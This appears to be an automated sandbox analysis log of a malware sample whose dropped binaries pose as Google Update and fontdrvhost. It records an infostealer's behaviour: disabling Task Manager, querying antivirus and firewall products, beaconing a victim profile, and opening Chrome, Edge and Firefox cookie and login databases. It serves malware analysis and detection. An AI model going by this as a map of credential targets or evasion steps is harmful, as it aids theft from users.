            Source: upfc.exe, 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.32","PCName":"PC-GJI1781","UserName":"user","IpInfo":{"ip":"89.187.171.161","city":"Atlanta","region":"Georgia","country":"US","loc":"33.7485,-84.3871","org":"Not specified - United States","postal":"000000","timezone":"America/New_York"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"GTCE1V (1 GB)","CPUName":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5,"extData":{"db4f70e6cbfde7de61dca6dd23b71ecb342fb588":"157 ms"}}
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CED5B cpuid 0_2_008CED5B
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_008CA63C
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeQueries volume information: C:\ComcontainerruntimeCrtNet\Blockruntime.exe VolumeInformationJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeQueries volume information: C:\Program Files (x86)\Google\Update\upfc.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Recovery\fontdrvhost.exeQueries volume information: C:\Recovery\fontdrvhost.exe VolumeInformation
            Source: C:\Recovery\fontdrvhost.exeQueries volume information: C:\Recovery\fontdrvhost.exe VolumeInformation
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeQueries volume information: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe VolumeInformation
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeQueries volume information: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe VolumeInformation
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_008CD5D4
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BACF5 GetVersionExW,0_2_008BACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1
            Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vC:\Users\All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eC:\Users\All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000004621000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:\Users\All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
            Source: upfc.exe, 00000014.00000002.2574244036.000000000618A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.1377650559.0000000012C0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Blockruntime.exe PID: 7588, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: upfc.exe PID: 5068, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6524, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 7840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7188, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RZctPlhC2XmeDKsE7v.exe PID: 7256, type: MEMORYSTR
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2574244036.0000000005E97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Safe Browsing Network\Safe Browsing Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
